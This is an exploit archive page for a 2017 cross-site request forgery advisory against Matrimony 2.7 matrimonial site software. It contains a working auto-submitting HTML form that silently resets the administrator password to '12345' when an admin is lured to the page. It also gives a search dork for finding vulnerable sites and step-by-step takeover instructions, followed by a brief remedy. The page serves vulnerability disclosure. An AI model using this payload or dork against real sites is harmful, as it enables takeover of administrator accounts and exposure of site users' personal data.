exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Matrimony 2.7 Cross Site Request Forgery

Matrimony 2.7 Cross Site Request Forgery
Posted Aug 28, 2017
Authored by Ali BawazeEer

Matrimony version 2.7 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | 816a06c7d7595ef71786ff4e62fb3f1dc153c5931fd480a80b7b0ff526b4b08f

Matrimony 2.7 Cross Site Request Forgery

Change Mirror Download


# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #

<!--
# Exploit Title: Matrimony 2.7 ( Admin account takeover ) Cross site request forgery
# Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer
# Dork: inurl:simplesearch_results.php
# Date: 28.08.2017
# Vendor Homepage: http://www.scubez.net/
# Software Demo Link: live.mscript.in [ administrator control panel been disabled after reporting the vulnerability ]
# Version: 2.7
# Category: Webapps
# Tested on: windows 7 / mozila firefox
#
#
-->

# ========================================================
#
#
# Matrimony 2.7 ( Admin account takeover ) Cross site request forgery
#
# Description : change password functionality in the admin panel does not check for current password and no CSRF token in place which allow
# an Attackers to be able to completely compromise the admin account by changing the password for the [ Admin ] account which is the default name
#
# exploitation code : -

<html>
<body>
<form name="csrf_form" action="http://vulnerablesite/admin/adminpass_submit.php" method="post">
<input name="txtp" id="txtp" type="hidden" value="12345">
<input name="txtcp" id="txtcp" type="hidden" value="12345">
<!-- <input name="Submit" value="Submit" type="submit"> -->
<script type="text/javascript">document.csrf_form.submit();</script>
</body>
</html>

# Steps to produce : -
# 1) host the above code in the cloud
# 2) trick the admin to visit the page
# 3) password will be changed to 12345
# 4) attacker can navigate to the admin panel http://localhost/script/admin/login.php
# 5) attacker should be able to login with new credentials as ( Admin ) since its the default account
#
#
#
# Risk : attackers are able to gain full access to the administrator panel after chaning the password for the admin
# and thus have total control over the web application, including content change,and change user's account download backup of the site access to user's data..
#
#
# Remedy : developer should implement a check for current password and use CSRF token for each request
#
#
#
# ========================================================
# [+] Disclaimer
#
# Permission is hereby granted for the redistribution of this advisory,
# provided that it is not altered except by reformatting it, and that due
# credit is given. Permission is explicitly given for insertion in
# vulnerability databases and similar, provided that due credit is given to
# the author. The author is not responsible for any misuse of the information contained
# herein and prohibits any malicious use of all security related information
# or exploits by the author or elsewhere.
#
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #





Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close